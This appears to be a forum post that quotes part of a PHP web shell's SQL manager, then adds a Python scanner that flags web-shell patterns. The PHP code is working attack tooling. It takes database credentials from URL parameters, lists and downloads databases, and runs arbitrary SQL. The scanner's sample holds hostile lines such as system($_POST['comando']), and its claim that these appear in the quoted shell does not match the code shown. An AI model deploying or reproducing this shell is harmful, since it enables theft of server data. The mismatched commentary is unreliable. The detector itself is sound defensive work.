if (isset($_GET['sql'])) {

echo "

<h2>SQL Manager</h2><br><br>

<form action='' method=GET>
Server : <input type=text name=host value=localhost><br>
User : <input type=text name=usuario value=root><br>
Pass : <input type=text name=password value=123><br><br>
<input type=submit name=entersql value=Connect>
</form>
";

}

if (isset($_GET['entersql'])) {

if ($mysql = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password'])) {
if ($databases = @mysql_list_dbs($mysql)) {

echo "<br><br><h2>Databases Found</h2><br>";
echo "<table>";
while($dat = @mysql_fetch_row($databases)) {
foreach($dat as $indice => $valor) {
echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&enterdb=".$valor.">Enter</a></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajardb=".$valor.">Download</a></td><tr>";
}
}
echo "</table>";
} else {
echo "<script>alert('Error loading databases');</script>";
exit(1);
}
} else {
echo "<script>alert('Error');</script>";
exit(1);
}
}

if (isset($_GET['enterdb'])) {

$mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);
mysql_select_db($_GET['enterdb']);
$tablas = mysql_query("show tables from ".$_GET['enterdb']) or die("error");
echo "<br><h2>Tables Found</h2><br><br><table>";
while ($tabla = mysql_fetch_row($tablas)) {
foreach($tabla as $indice => $valor) {
echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&entertable=".$valor."&condb=".$_GET['enterdb'].">Enter</a></td></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajartabla=".$valor."&condb=".$_GET['enterdb'].">Download</a><tr>";
}
}
echo "</table>";
}

if (isset($_GET['entertable'])) {

$mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);
mysql_select_db($_GET['condb']);

echo "<br><h2>SQL Manager</h2>
<br><br>
<form action='' method=POST>
Consulta SQL : <input type=text name=sentencia size=70>
<br><br><br>
<input type=hidden name=host value=".$_GET['host'].">
<input type=hidden name=usuario value=".$_GET['usuario'].">
<input type=hidden name=password value=".$_GET['password'].">
<input type=hidden name=condb value=".$_GET['database'].">
<input type=hidden name=entertable value=".$_GET['tabla'].">
<input type=submit name=mostrar value=eNViar>
</form>
<br><br><br><br><br>";

$conexion = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>");
mysql_select_db($_GET['condb']);

if (isset($_POST['mostrar'])) {
if(!empty($_POST['sentencia'])) {
$resultado = mysql_query($_POST['sentencia']);
} else {
$resultado = mysql_query("SELECT * FROM ".$_GET['entertable']);
}

$numer = 0;

echo "<table>";
for ($i=0;$i< mysql_num_fields($resultado);$i++) {
echo "<th class=main>".mysql_field_name($resultado,$i)."</th>";
$numer++;
}
while($dat = mysql_fetch_row($resultado)) {
echo "<tr>";
foreach($dat as $val) {
echo "<td class=main>".$val."</td>";
}
}
echo "</tr></table>";
}
}

echo "<br><br>";

} else {


echo "
<form action='' method=POST>
user : <input type=text name=user><br>
pass : <input type=text name=pass><br><br>
<input type=submit value=Login>
</form>
";

}

// ¿ The End ?

?>

Edited by io.kent
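A defender-side view of the shell quoted above, as an added example that is not part of the original post: a small Python heuristic that flags PHP source where request data (`$_GET`, `$_POST`, ...) is passed straight into execution, file or query sinks, the pattern visible in `eval($_POST['codigo'])` and `system($_POST['comando'])`. The sink list, the category labels and the constructed `SAMPLE` are assumptions of this example, and the matching is textual, so a hit is a lead for review rather than proof.

```python
import re
from typing import Dict, List, NamedTuple

# Request superglobals treated as attacker-controlled sources (assumption of this example).
SOURCE_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES)\b")

# Sinks grouped by what they hand to whoever controls the request.
SINKS: Dict[str, List[str]] = {
    "code-exec": ["eval", "assert", "create_function"],
    "command-exec": ["system", "exec", "passthru", "shell_exec", "popen", "proc_open"],
    "file-write": ["fopen", "fwrite", "file_put_contents", "copy", "rename",
                   "chmod", "unlink", "rmdir", "mkdir"],
    "file-read": ["readfile", "file", "file_get_contents"],
    "db-query": ["mysql_query", "mysqli_query"],
}
CATEGORY = {name: cat for cat, names in SINKS.items() for name in names}
HIGH_RISK = {"code-exec", "command-exec"}

# A sink name followed by "(", not preceded by an identifier character, "$", ">" or ":"
# (so variables, method calls and longer function names do not match).
SINK_RE = re.compile(
    r"(?<![\w$>:])(" + "|".join(sorted(map(re.escape, CATEGORY), key=len, reverse=True)) + r")\s*\(",
    re.I,
)


class Finding(NamedTuple):
    line: int
    category: str
    sink: str
    source: str


def _strip_comments(source: str) -> str:
    """Blank /* */ blocks and whole-line // or # comments, keeping line numbers intact."""
    source = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), source, flags=re.S)
    return re.sub(r"(?m)^[ \t]*(?://|#).*$", "", source)


def _call_args(text: str, start: int) -> str:
    """Return the argument text of a call whose '(' ends just before index `start`."""
    depth, quote, i = 1, None, start
    while i < len(text) and depth:
        ch = text[i]
        if quote:
            if ch == "\\":
                i += 1                  # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        i += 1
    return text[start:i - 1] if depth == 0 else text[start:i]


def scan_php(source: str) -> List[Finding]:
    """List every sink call whose arguments contain a request superglobal."""
    text = _strip_comments(source)
    findings = []
    for m in SINK_RE.finditer(text):
        src = SOURCE_RE.search(_call_args(text, m.end()))
        if src:
            line = text.count("\n", 0, m.start()) + 1
            name = m.group(1).lower()
            findings.append(Finding(line, CATEGORY[name], name, src.group(0)))
    return findings


def verdict(findings: List[Finding]) -> str:
    """Request data reaching code or command execution is treated as a likely web shell."""
    cats = {f.category for f in findings}
    if cats & HIGH_RISK:
        return "likely-webshell"
    return "review" if cats else "clean"


# Constructed sample: a few handlers in the style of the shell quoted above.
SAMPLE = """<?php
// constructed input for the scanner
if (isset($_POST['ejecutar'])) {
    if (!system($_POST['comando'])) { echo "Error"; }
}
if (isset($_POST['cargar'])) {
    eval($_POST['codigo']);
}
//unlink(basename($_SERVER['PHP_SELF']));
readfile($_GET['down']);
$ok = system("uptime");
"""

if __name__ == "__main__":
    for f in scan_php(SAMPLE):
        print(f"line {f.line}: {f.sink}() receives {f.source} [{f.category}]")
    print("verdict:", verdict(scan_php(SAMPLE)))
```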
